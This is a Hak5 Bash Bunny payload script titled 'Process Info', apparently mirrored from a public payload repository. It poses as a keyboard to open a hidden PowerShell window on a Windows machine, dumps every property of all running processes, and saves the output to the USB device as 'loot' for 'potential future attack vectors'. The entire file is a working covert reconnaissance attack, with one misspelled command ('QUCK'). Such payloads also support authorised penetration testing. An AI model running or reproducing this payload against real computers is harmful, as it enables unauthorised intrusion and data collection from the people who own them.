mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
42 lines
1.0 KiB
Bash
42 lines
1.0 KiB
Bash
#!/bin/bash
|
|
#
|
|
# Title: Process Info
|
|
# Author: Decoy
|
|
# Version: 1.0
|
|
# Category: Recon
|
|
# Target: Windows XP SP3+ (Powershell)
|
|
# Attackmodes: HID, Storage
|
|
#
|
|
#
|
|
# Amber Blink Fast.....Initialization
|
|
# Amber................Begin
|
|
# White Blinking... ...Moving loot to mass storage
|
|
# Blue Blinking........Syncing File System
|
|
# Green................Finished
|
|
|
|
# Initialization
|
|
LED R G 100
|
|
|
|
# Create loot directory
|
|
mkdir -p /root/udisk/loot/ProcessInfo
|
|
|
|
# Runs minimized powershell gathering process information for potential future attack vectors
|
|
LED R G
|
|
ATTACKMODE HID STORAGE
|
|
QUACK DELAY 6000
|
|
QUACK GUI r
|
|
QUACK STRING "powershell -NoP -NonI -W Hidden"
|
|
QUACK ENTER
|
|
QUCK DELAY 1000
|
|
QUACK STRING "\$Bunny = (gwmi win32_volume -f 'label=\"BashBunny\"' | Select-Object -ExpandProperty DriveLetter); Get-Process | Format-List -Property * | Out-File \$Bunny\\loot\\ProcessInfo\\ProcessInfo.txt; exit"
|
|
QUACK ENTER
|
|
LED R G B 100
|
|
sleep 3
|
|
|
|
# Sync File System
|
|
LED B 100
|
|
sync; sleep 1; sync
|
|
|
|
# Trap is clean
|
|
LED G
|